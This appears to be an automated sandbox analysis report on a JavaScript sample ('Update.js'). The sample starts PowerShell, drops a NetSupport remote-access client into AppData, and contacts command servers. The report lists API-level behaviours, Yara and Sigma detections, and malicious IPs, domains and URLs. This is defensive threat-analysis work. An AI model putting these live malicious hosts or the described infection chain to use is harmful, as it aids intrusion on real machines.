Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe Code function: GetLocaleInfoW,_GetPrimaryLen,_strlen, 10_2_1117483D
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe Code function: _strlen,_GetPrimaryLen,EnumSystemLocalesA, 10_2_11174B90
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage, 10_2_11174A69
Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression.FileSystem\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.FileSystem.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe Code function: 10_2_110F37A0 LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateNamedPipeA,GetLastError,Sleep,CreateNamedPipeA,LocalFree, 10_2_110F37A0
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe Code function: 10_2_11134830 GetLocalTime,LoadLibraryA,GetCurrentProcess,GetProcAddress,GetProcAddress,GetProcessHandleCount,SetLastError,GetProcAddress,GetProcAddress,SetLastError,SetLastError,GetProcAddress,K32GetProcessMemoryInfo,SetLastError,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary, 10_2_11134830
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe Code function: 10_2_11147160 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetUserNameW,GetTickCount,GetTickCount,GetTickCount,FreeLibrary, 10_2_11147160
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe Code function: 10_2_1117594C __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,_strcpy_s,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte, 10_2_1117594C
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe Code function: 10_2_11145C70 wsprintfA,GetVersionExA,RegOpenKeyExA,_memset,_strncpy,RegCloseKey, 10_2_11145C70
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe Code function: 10_2_11070430 CapiHangup,CapiClose,CapiOpen,CapiListen,GetTickCount,GetTickCount,GetTickCount,CapiHangup,Sleep,GetTickCount,Sleep, 10_2_11070430
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe Code function: 10_2_6CA8A980 EnterCriticalSection,LeaveCriticalSection,LeaveCriticalSection,LeaveCriticalSection,WSAGetLastError,socket,WSAGetLastError,#21,#21,#21,bind,WSAGetLastError,closesocket,htons,WSASetBlockingHook,WSAGetLastError,WSAUnhookBlockingHook,closesocket,WSAGetLastError,WSAUnhookBlockingHook,closesocket,WSAUnhookBlockingHook,EnterCriticalSection,InitializeCriticalSection,getsockname,LeaveCriticalSection,GetTickCount,InterlockedExchange, 10_2_6CA8A980
Yara detected NetSupport remote tool
Source: Yara match File source: 10.2.client32.exe.747f0000.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.0.client32.exe.440000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.client32.exe.73a80000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.client32.exe.111b8c68.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.client32.exe.6ca80000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.powershell.exe.26c00bcaaf0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.powershell.exe.26c00bc08a0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.powershell.exe.26c00ba9ff8.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.client32.exe.11000000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000A.00000002.2489223815.0000000000442000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.2505080118.0000000002E68000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.1567156116.0000026C00BC8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.1567156116.0000026C00CEF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.2532853143.000000006CAC0000.00000002.00000001.01000000.0000000D.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.1567156116.0000026C00BBE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000000.1514998417.0000000000442000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.1567156116.0000026C00B9F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.1567156116.0000026C0059F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: powershell.exe PID: 6704, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: client32.exe PID: 4108, type: MEMORYSTR
Source: Yara match File source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\PCICHEK.DLL, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\pcicapi.dll, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\TCCTL32.DLL, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\HTCTL32.DLL, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\PCICL32.DLL, type: DROPPED
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1529030 Sample: Update.js Startdate: 08/10/2024 Architecture: WINDOWS Score: 100 34 ggoryo.com 2->34 36 geo.netsupportsoftware.com 2->36 48 Suricata IDS alerts for network traffic 2->48 50 Malicious sample detected (through community Yara rule) 2->50 52 Sigma detected: Powershell drops NetSupport RAT client 2->52 54 6 other signatures 2->54 8 wscript.exe 1 7 2->8         started        signatures3 process4 dnsIp5 38 ggoryo.com 77.83.199.112, 443, 49705, 49707 ASN-MOLMoscowRussiaRU Lithuania 8->38 56 System process connects to network (likely due to code injection or exploit) 8->56 58 Suspicious powershell command line found 8->58 60 Wscript starts Powershell (via cmd or directly) 8->60 62 2 other signatures 8->62 12 powershell.exe 15 35 8->12         started        signatures6 process7 file8 22 C:\Users\user\AppData\...\remcmdstub.exe, PE32 12->22 dropped 24 C:\Users\user\AppData\Roaming\...\pcicapi.dll, PE32 12->24 dropped 26 C:\Users\user\AppData\...\client32.exe, PE32 12->26 dropped 28 6 other files (5 malicious) 12->28 dropped 64 Found suspicious powershell code related to unpacking or dynamic code loading 12->64 66 Powershell drops PE file 12->66 16 client32.exe 16 12->16         started        20 conhost.exe 12->20         started        signatures9 process10 dnsIp11 30 5.181.159.137, 443, 49708 MIVOCLOUDMD Moldova Republic of 16->30 32 geo.netsupportsoftware.com 104.26.1.231, 49709, 80 CLOUDFLARENETUS United States 16->32 40 Multi AV Scanner detection for dropped file 16->40 42 Contains functionalty to change the wallpaper 16->42 44 Delayed program exit found 16->44 46 Contains functionality to detect sleep reduction / modifications 16->46 signatures12
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
77.83.199.112
 ggoryo.com Lithuania
12679 ASN-MOLMoscowRussiaRU true
5.181.159.137
 unknown Moldova Republic of
39798 MIVOCLOUDMD true
104.26.1.231
 geo.netsupportsoftware.com United States
13335 CLOUDFLARENETUS false

Contacted Domains

Name IP Active
geo.netsupportsoftware.com 104.26.1.231 true
ggoryo.com 77.83.199.112 true

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://geo.netsupportsoftware.com/location/loca.asp false
    		unknown
    http://5.181.159.137/fakeurl.htm true
      		unknown
      https://ggoryo.com/trade/da.php?9800 true
        		unknown
        https://ggoryo.com/trade/fix.php?6867 true
          		unknown